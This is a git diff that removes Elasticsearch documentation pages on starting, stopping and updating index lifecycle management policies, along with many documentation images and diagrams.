indices with names that start with `mylogs-pre-ilm` diff --git a/docs/reference/ilm/start-stop.asciidoc b/docs/reference/ilm/start-stop.asciidoc deleted file mode 100644 index 3e630c7f527..00000000000 --- a/docs/reference/ilm/start-stop.asciidoc +++ /dev/null @@ -1,140 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[start-stop-ilm]] -== Start and stop {ilm} - -By default, the {ilm-init} service is in the `RUNNING` state and manages -all indices that have lifecycle policies. - -You can stop {ilm} to suspend management operations for all indices. -For example, you might stop {ilm} when performing scheduled maintenance or making -changes to the cluster that could impact the execution of {ilm-init} actions. - -IMPORTANT: When you stop {ilm-init}, <> -operations are also suspended. -No snapshots will be taken as scheduled until you restart {ilm-init}. -In-progress snapshots are not affected. 
- -[discrete] -[[get-ilm-status]] -=== Get {ilm-init} status - -To see the current status of the {ilm-init} service, use the <>: - -//// -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy" - } -} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET _ilm/status --------------------------------------------------- - -Under normal operation, the response shows {ilm-init} is `RUNNING`: - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "RUNNING" -} --------------------------------------------------- - - - -[discrete] -[[stop-ilm]] -=== Stop {ilm-init} - -To stop the {ilm-init} service and pause execution of all lifecycle policies, -use the <>: - -[source,console] --------------------------------------------------- -POST _ilm/stop --------------------------------------------------- -// TEST[continued] - -{ilm-init} service runs all policies to a point where it is safe to stop. -While the {ilm-init} service is shutting down, -the status API shows {ilm-init} is in the `STOPPING` mode: - -//// -[source,console] --------------------------------------------------- -GET _ilm/status --------------------------------------------------- -// TEST[continued] -//// - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "STOPPING" -} --------------------------------------------------- -// TESTRESPONSE[s/"STOPPING"/$body.operation_mode/] - -Once all policies are at a safe stopping point, {ilm-init} moves into the `STOPPED` mode: - -//// -[source,console] --------------------------------------------------- -PUT trigger_ilm_cs_action - -GET _ilm/status --------------------------------------------------- -// TEST[continued] -//// - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "STOPPED" -} --------------------------------------------------- -// TESTRESPONSE[s/"STOPPED"/$body.operation_mode/] - -[discrete] -=== Start {ilm-init} - -To restart {ilm-init} and resume executing policies, use the <>. -This puts the {ilm-init} service in the `RUNNING` state and -{ilm-init} begins executing policies from where it left off. - -[source,console] --------------------------------------------------- -POST _ilm/start --------------------------------------------------- -// TEST[continued] - - diff --git a/docs/reference/ilm/update-lifecycle-policy.asciidoc b/docs/reference/ilm/update-lifecycle-policy.asciidoc deleted file mode 100644 index 75f3a6a7cb9..00000000000 --- a/docs/reference/ilm/update-lifecycle-policy.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[update-lifecycle-policy]] -=== Lifecycle policy updates -++++ -Policy updates -++++ - -You can change how the lifecycle of an index or collection of rolling indices is managed -by modifying the current policy or switching to a different policy. - -To ensure that policy updates don't put an index into a state where it can't exit the current phase, -the phase definition is cached in the index metadata when it enters the phase. -This cached definition is used to complete the phase. 
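If you want to see which phase definition an index is currently executing, the cached copy appears in the `phase_execution` object of the explain API response (the index name here is only a placeholder):

[source,console]
--------------------------------------------------
GET my-index-000001/_ilm/explain <1>
--------------------------------------------------
<1> Replace `my-index-000001` with the name of a managed index.

The `phase_execution.phase_definition` object is the cached phase, which can differ from the latest version of the policy if the policy has been updated since the index entered the phase.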
- -When the index advances to the next phase, it uses the phase definition from the updated policy. - -[discrete] -[[ilm-apply-changes]] -=== How changes are applied - -When a policy is initially applied to an index, the index gets the latest version of the policy. -If you update the policy, the policy version is bumped and {ilm-init} can detect that the index -is using an earlier version that needs to be updated. - -Changes to `min_age` are not propagated to the cached definition. -Changing a phase's `min_age` does not affect indices that are currently executing that phase. - -For example, if you create a policy that has a hot phase that does not specify a `min_age`, -indices immediately enter the hot phase when the policy is applied. -If you then update the policy to specify a `min_age` of 1 day for the hot phase, -that has no effect on indices that are already in the hot phase. -Indices created _after_ the policy update won't enter the hot phase until they are a day old. - -[discrete] -[[ilm-apply-new-policy]] -=== How new policies are applied - -When you apply a different policy to a managed index, -the index completes the current phase using the cached definition from the previous policy. -The index starts using the new policy when it moves to the next phase. diff --git a/docs/reference/images/Exponential.png b/docs/reference/images/Exponential.png deleted file mode 100644 index 1591f747a13..00000000000 Binary files a/docs/reference/images/Exponential.png and /dev/null differ diff --git a/docs/reference/images/Gaussian.png b/docs/reference/images/Gaussian.png deleted file mode 100644 index 9d49bfb9470..00000000000 Binary files a/docs/reference/images/Gaussian.png and /dev/null differ diff --git a/docs/reference/images/Linear.png b/docs/reference/images/Linear.png deleted file mode 100644 index d06862266c1..00000000000 Binary files a/docs/reference/images/Linear.png and /dev/null differ diff --git a/docs/reference/images/analysis/token-graph-basic.svg b/docs/reference/images/analysis/token-graph-basic.svg deleted file mode 100644 index 99c2b0cb24f..00000000000 --- a/docs/reference/images/analysis/token-graph-basic.svg +++ /dev/null @@ -1,45 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-dns-ex.svg b/docs/reference/images/analysis/token-graph-dns-ex.svg deleted file mode 100644 index 0eda4fa54bd..00000000000 --- a/docs/reference/images/analysis/token-graph-dns-ex.svg +++ /dev/null @@ -1,65 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-dns-invalid-ex.svg b/docs/reference/images/analysis/token-graph-dns-invalid-ex.svg deleted file mode 100644 index 5614f39bfe3..00000000000 --- a/docs/reference/images/analysis/token-graph-dns-invalid-ex.svg +++ /dev/null @@ -1,72 +0,0 @@ - - - - Slice 1 - Created with Sketch. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-dns-synonym-ex.svg b/docs/reference/images/analysis/token-graph-dns-synonym-ex.svg deleted file mode 100644 index cff5b1306b7..00000000000 --- a/docs/reference/images/analysis/token-graph-dns-synonym-ex.svg +++ /dev/null @@ -1,72 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-qbf-ex.svg b/docs/reference/images/analysis/token-graph-qbf-ex.svg deleted file mode 100644 index 63970673092..00000000000 --- a/docs/reference/images/analysis/token-graph-qbf-ex.svg +++ /dev/null @@ -1,45 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-qbf-synonym-ex.svg b/docs/reference/images/analysis/token-graph-qbf-synonym-ex.svg deleted file mode 100644 index 2baa3d9e63c..00000000000 --- a/docs/reference/images/analysis/token-graph-qbf-synonym-ex.svg +++ /dev/null @@ -1,52 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-wd.svg b/docs/reference/images/analysis/token-graph-wd.svg deleted file mode 100644 index cdbbfb8a084..00000000000 --- a/docs/reference/images/analysis/token-graph-wd.svg +++ /dev/null @@ -1,52 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-wdg.svg b/docs/reference/images/analysis/token-graph-wdg.svg deleted file mode 100644 index 992637bd668..00000000000 --- a/docs/reference/images/analysis/token-graph-wdg.svg +++ /dev/null @@ -1,53 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/cardinality_error.png b/docs/reference/images/cardinality_error.png deleted file mode 100644 index cf405be69ab..00000000000 Binary files a/docs/reference/images/cardinality_error.png and /dev/null differ diff --git a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-results.svg b/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-results.svg deleted file mode 100644 index 3c48418b9c4..00000000000 --- a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-results.svg +++ /dev/null @@ -1,83 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-search.svg b/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-search.svg deleted file mode 100644 index dbf852edd46..00000000000 --- a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-search.svg +++ /dev/null @@ -1,83 +0,0 @@ - - - - Slice 1 - Created with Sketch. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.png b/docs/reference/images/ccs/ccs-min-roundtrip-client-request.png deleted file mode 100644 index bf023da054b..00000000000 Binary files a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.png and /dev/null differ diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.svg b/docs/reference/images/ccs/ccs-min-roundtrip-client-request.svg deleted file mode 100644 index 7224a25c24a..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.svg +++ /dev/null @@ -1,81 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-client-response.svg b/docs/reference/images/ccs/ccs-min-roundtrip-client-response.svg deleted file mode 100644 index e806b2c4731..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-client-response.svg +++ /dev/null @@ -1,79 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-results.svg b/docs/reference/images/ccs/ccs-min-roundtrip-cluster-results.svg deleted file mode 100644 index 9ffb651b9da..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-results.svg +++ /dev/null @@ -1,77 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-search.svg b/docs/reference/images/ccs/ccs-min-roundtrip-cluster-search.svg deleted file mode 100644 index eb481182953..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-search.svg +++ /dev/null @@ -1,77 +0,0 @@ - - - - Slice 1 - Created with Sketch. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/data-streams/create-index-template.png b/docs/reference/images/data-streams/create-index-template.png deleted file mode 100644 index 7506409897e..00000000000 Binary files a/docs/reference/images/data-streams/create-index-template.png and /dev/null differ diff --git a/docs/reference/images/data-streams/data-streams-diagram.svg b/docs/reference/images/data-streams/data-streams-diagram.svg deleted file mode 100644 index 361345a43a7..00000000000 --- a/docs/reference/images/data-streams/data-streams-diagram.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/data-streams/data-streams-index-request.svg b/docs/reference/images/data-streams/data-streams-index-request.svg deleted file mode 100644 index 08daf499d8e..00000000000 --- a/docs/reference/images/data-streams/data-streams-index-request.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/data-streams/data-streams-list.png b/docs/reference/images/data-streams/data-streams-list.png deleted file mode 100644 index 38ec3727e49..00000000000 Binary files a/docs/reference/images/data-streams/data-streams-list.png and /dev/null differ diff --git a/docs/reference/images/data-streams/data-streams-search-request.svg b/docs/reference/images/data-streams/data-streams-search-request.svg deleted file mode 100644 index e827b783f06..00000000000 --- a/docs/reference/images/data-streams/data-streams-search-request.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/decay_2d.png b/docs/reference/images/decay_2d.png deleted file mode 100644 index df03db4965a..00000000000 Binary files a/docs/reference/images/decay_2d.png and /dev/null differ diff --git a/docs/reference/images/eql/separate-state-machines.svg b/docs/reference/images/eql/separate-state-machines.svg deleted file mode 100644 index 635d2139c3b..00000000000 --- a/docs/reference/images/eql/separate-state-machines.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/eql/sequence-state-machine.svg b/docs/reference/images/eql/sequence-state-machine.svg deleted file mode 100644 index 78229666dae..00000000000 --- a/docs/reference/images/eql/sequence-state-machine.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/ilm/create-policy.png b/docs/reference/images/ilm/create-policy.png deleted file mode 100644 index f6d86fa9b4e..00000000000 Binary files a/docs/reference/images/ilm/create-policy.png and /dev/null differ diff --git a/docs/reference/images/ilm/create-template-wizard-my_template.png b/docs/reference/images/ilm/create-template-wizard-my_template.png deleted file mode 100644 index fd712e2a6e4..00000000000 Binary files a/docs/reference/images/ilm/create-template-wizard-my_template.png and /dev/null differ diff --git a/docs/reference/images/ilm/create-template-wizard.png b/docs/reference/images/ilm/create-template-wizard.png deleted file mode 100644 index d16f785e927..00000000000 Binary files a/docs/reference/images/ilm/create-template-wizard.png and /dev/null differ diff --git a/docs/reference/images/ilm/index-lifecycle-policies.png b/docs/reference/images/ilm/index-lifecycle-policies.png deleted file mode 100644 index 184188be181..00000000000 Binary files 
a/docs/reference/images/ilm/index-lifecycle-policies.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-custom-policy.png b/docs/reference/images/ilm/tutorial-ilm-custom-policy.png deleted file mode 100644 index 03b67829f60..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-custom-policy.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-delete-phase-creation.png b/docs/reference/images/ilm/tutorial-ilm-delete-phase-creation.png deleted file mode 100644 index 91a55733c28..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-delete-phase-creation.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-delete-rollover.png b/docs/reference/images/ilm/tutorial-ilm-delete-rollover.png deleted file mode 100644 index ba021ecc2ac..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-delete-rollover.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-hotphaserollover-default.png b/docs/reference/images/ilm/tutorial-ilm-hotphaserollover-default.png deleted file mode 100644 index a9088c63d88..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-hotphaserollover-default.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png b/docs/reference/images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png deleted file mode 100644 index c6f1e9b40e9..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management-index-templates-mappings.png b/docs/reference/images/index-mgmt/management-index-templates-mappings.png deleted file mode 100644 index beb964b3481..00000000000 Binary files a/docs/reference/images/index-mgmt/management-index-templates-mappings.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management-index-templates.png b/docs/reference/images/index-mgmt/management-index-templates.png deleted file mode 100644 index 07f1fb9a7ad..00000000000 Binary files a/docs/reference/images/index-mgmt/management-index-templates.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_component_template.png b/docs/reference/images/index-mgmt/management_index_component_template.png deleted file mode 100644 index c03029fd172..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_component_template.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_create_wizard.png b/docs/reference/images/index-mgmt/management_index_create_wizard.png deleted file mode 100644 index bff1dd4cd0e..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_create_wizard.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_data_stream_backing_index.png b/docs/reference/images/index-mgmt/management_index_data_stream_backing_index.png deleted file mode 100644 index a5c577affbb..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_data_stream_backing_index.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_data_stream_stats.png b/docs/reference/images/index-mgmt/management_index_data_stream_stats.png deleted file mode 100644 index a67ab4a7deb..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_data_stream_stats.png and /dev/null differ diff --git 
a/docs/reference/images/index-mgmt/management_index_details.png b/docs/reference/images/index-mgmt/management_index_details.png deleted file mode 100644 index b199d13218f..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_details.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_labels.png b/docs/reference/images/index-mgmt/management_index_labels.png deleted file mode 100644 index a89c32e08be..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_labels.png and /dev/null differ diff --git a/docs/reference/images/ingest/enrich/enrich-policy-index.svg b/docs/reference/images/ingest/enrich/enrich-policy-index.svg deleted file mode 100644 index 8ec6ae59a68..00000000000 --- a/docs/reference/images/ingest/enrich/enrich-policy-index.svg +++ /dev/null @@ -1,40 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ingest/enrich/enrich-process.svg b/docs/reference/images/ingest/enrich/enrich-process.svg deleted file mode 100644 index a346f759238..00000000000 --- a/docs/reference/images/ingest/enrich/enrich-process.svg +++ /dev/null @@ -1,64 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ingest/enrich/enrich-processor.svg b/docs/reference/images/ingest/enrich/enrich-processor.svg deleted file mode 100644 index 95978c6026b..00000000000 --- a/docs/reference/images/ingest/enrich/enrich-processor.svg +++ /dev/null @@ -1,50 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ingest/ingest-process.svg b/docs/reference/images/ingest/ingest-process.svg deleted file mode 100644 index 66557798531..00000000000 --- a/docs/reference/images/ingest/ingest-process.svg +++ /dev/null @@ -1,42 +0,0 @@ - - - - Enrich process 2 - Created with Sketch. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/lambda.png b/docs/reference/images/lambda.png deleted file mode 100644 index 324967326f9..00000000000 Binary files a/docs/reference/images/lambda.png and /dev/null differ diff --git a/docs/reference/images/lambda_calc.png b/docs/reference/images/lambda_calc.png deleted file mode 100644 index 4fd19a2660f..00000000000 Binary files a/docs/reference/images/lambda_calc.png and /dev/null differ diff --git a/docs/reference/images/lucene-in-memory-buffer.png b/docs/reference/images/lucene-in-memory-buffer.png deleted file mode 100644 index 37674886183..00000000000 Binary files a/docs/reference/images/lucene-in-memory-buffer.png and /dev/null differ diff --git a/docs/reference/images/lucene-written-not-committed.png b/docs/reference/images/lucene-written-not-committed.png deleted file mode 100644 index 9d295fb412f..00000000000 Binary files a/docs/reference/images/lucene-written-not-committed.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/elasticsearch_exe.png b/docs/reference/images/msi_installer/elasticsearch_exe.png deleted file mode 100644 index fd84e5397bf..00000000000 Binary files a/docs/reference/images/msi_installer/elasticsearch_exe.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_configuration.png b/docs/reference/images/msi_installer/msi_installer_configuration.png deleted file mode 100644 index 36bae6cc519..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_configuration.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_help.png b/docs/reference/images/msi_installer/msi_installer_help.png deleted file mode 100644 index 458b0821c1f..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_help.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_installed_service.png b/docs/reference/images/msi_installer/msi_installer_installed_service.png deleted file mode 100644 index 34585377a91..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_installed_service.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_installing.png b/docs/reference/images/msi_installer/msi_installer_installing.png deleted file mode 100644 index 590c52371a7..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_installing.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_locations.png b/docs/reference/images/msi_installer/msi_installer_locations.png deleted file mode 100644 index ba7151e3714..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_locations.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_no_service.png b/docs/reference/images/msi_installer/msi_installer_no_service.png deleted file mode 100644 index fbe9a0510c7..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_no_service.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_plugins.png b/docs/reference/images/msi_installer/msi_installer_plugins.png deleted file mode 100644 index e58f426a47d..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_plugins.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_selected_plugins.png 
b/docs/reference/images/msi_installer/msi_installer_selected_plugins.png deleted file mode 100644 index e58f426a47d..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_selected_plugins.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_service.png b/docs/reference/images/msi_installer/msi_installer_service.png deleted file mode 100644 index c7fae13637b..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_service.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_success.png b/docs/reference/images/msi_installer/msi_installer_success.png deleted file mode 100644 index 3a58467ae18..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_success.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_uninstall.png b/docs/reference/images/msi_installer/msi_installer_uninstall.png deleted file mode 100644 index 6b5b69a5768..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_uninstall.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_upgrade_configuration.png b/docs/reference/images/msi_installer/msi_installer_upgrade_configuration.png deleted file mode 100644 index 7ca413bb299..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_upgrade_configuration.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_upgrade_notice.png b/docs/reference/images/msi_installer/msi_installer_upgrade_notice.png deleted file mode 100644 index e5ee18b5208..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_upgrade_notice.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_upgrade_plugins.png b/docs/reference/images/msi_installer/msi_installer_upgrade_plugins.png deleted file mode 100644 index 3e7496505f7..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_upgrade_plugins.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_xpack.png b/docs/reference/images/msi_installer/msi_installer_xpack.png deleted file mode 100644 index e457a578877..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_xpack.png and /dev/null differ diff --git a/docs/reference/images/percentiles_error.png b/docs/reference/images/percentiles_error.png deleted file mode 100644 index b57464e72e0..00000000000 Binary files a/docs/reference/images/percentiles_error.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_0.2beta.png b/docs/reference/images/pipeline_movavg/double_0.2beta.png deleted file mode 100644 index 64499b98342..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_0.2beta.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_0.7beta.png b/docs/reference/images/pipeline_movavg/double_0.7beta.png deleted file mode 100644 index b9f530227d9..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_0.7beta.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/double_prediction_global.png b/docs/reference/images/pipeline_movavg/double_prediction_global.png deleted file mode 100644 index faee6d22bc2..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_prediction_global.png and /dev/null differ diff --git 
a/docs/reference/images/pipeline_movavg/double_prediction_local.png b/docs/reference/images/pipeline_movavg/double_prediction_local.png deleted file mode 100644 index 930a5cfde9b..00000000000 Binary files a/docs/reference/images/pipeline_movavg/double_prediction_local.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/linear_100window.png b/docs/reference/images/pipeline_movavg/linear_100window.png deleted file mode 100644 index 3a4d51ae956..00000000000 Binary files a/docs/reference/images/pipeline_movavg/linear_100window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/linear_10window.png b/docs/reference/images/pipeline_movavg/linear_10window.png deleted file mode 100644 index 1407ded8791..00000000000 Binary files a/docs/reference/images/pipeline_movavg/linear_10window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/movavg_100window.png b/docs/reference/images/pipeline_movavg/movavg_100window.png deleted file mode 100644 index 45094ec2681..00000000000 Binary files a/docs/reference/images/pipeline_movavg/movavg_100window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/movavg_10window.png b/docs/reference/images/pipeline_movavg/movavg_10window.png deleted file mode 100644 index 1e9f543385f..00000000000 Binary files a/docs/reference/images/pipeline_movavg/movavg_10window.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/simple_prediction.png b/docs/reference/images/pipeline_movavg/simple_prediction.png deleted file mode 100644 index d74724e1546..00000000000 Binary files a/docs/reference/images/pipeline_movavg/simple_prediction.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/single_0.2alpha.png b/docs/reference/images/pipeline_movavg/single_0.2alpha.png deleted file mode 100644 index d96cf771743..00000000000 Binary files a/docs/reference/images/pipeline_movavg/single_0.2alpha.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/single_0.7alpha.png b/docs/reference/images/pipeline_movavg/single_0.7alpha.png deleted file mode 100644 index bf7bdd1752e..00000000000 Binary files a/docs/reference/images/pipeline_movavg/single_0.7alpha.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/triple.png b/docs/reference/images/pipeline_movavg/triple.png deleted file mode 100644 index 8aaf281c1bf..00000000000 Binary files a/docs/reference/images/pipeline_movavg/triple.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/triple_prediction.png b/docs/reference/images/pipeline_movavg/triple_prediction.png deleted file mode 100644 index fb34881d1e3..00000000000 Binary files a/docs/reference/images/pipeline_movavg/triple_prediction.png and /dev/null differ diff --git a/docs/reference/images/pipeline_movavg/triple_untruncated.png b/docs/reference/images/pipeline_movavg/triple_untruncated.png deleted file mode 100644 index 4f7528ea5fe..00000000000 Binary files a/docs/reference/images/pipeline_movavg/triple_untruncated.png and /dev/null differ diff --git a/docs/reference/images/pipeline_serialdiff/dow.png b/docs/reference/images/pipeline_serialdiff/dow.png deleted file mode 100644 index d46f507ded1..00000000000 Binary files a/docs/reference/images/pipeline_serialdiff/dow.png and /dev/null differ diff --git a/docs/reference/images/pipeline_serialdiff/lemmings.png b/docs/reference/images/pipeline_serialdiff/lemmings.png deleted file mode 100644 index 25f3bb7d1a1..00000000000 Binary files 
a/docs/reference/images/pipeline_serialdiff/lemmings.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/accuracy_0001.png b/docs/reference/images/rare_terms/accuracy_0001.png deleted file mode 100644 index 0c13a3938cd..00000000000 Binary files a/docs/reference/images/rare_terms/accuracy_0001.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/accuracy_001.png b/docs/reference/images/rare_terms/accuracy_001.png deleted file mode 100644 index 2aa1be316c3..00000000000 Binary files a/docs/reference/images/rare_terms/accuracy_001.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/accuracy_01.png b/docs/reference/images/rare_terms/accuracy_01.png deleted file mode 100644 index 7182b7d3c53..00000000000 Binary files a/docs/reference/images/rare_terms/accuracy_01.png and /dev/null differ diff --git a/docs/reference/images/rare_terms/memory.png b/docs/reference/images/rare_terms/memory.png deleted file mode 100644 index e0de5c21639..00000000000 Binary files a/docs/reference/images/rare_terms/memory.png and /dev/null differ diff --git a/docs/reference/images/s_calc.png b/docs/reference/images/s_calc.png deleted file mode 100644 index 3fb95e58df5..00000000000 Binary files a/docs/reference/images/s_calc.png and /dev/null 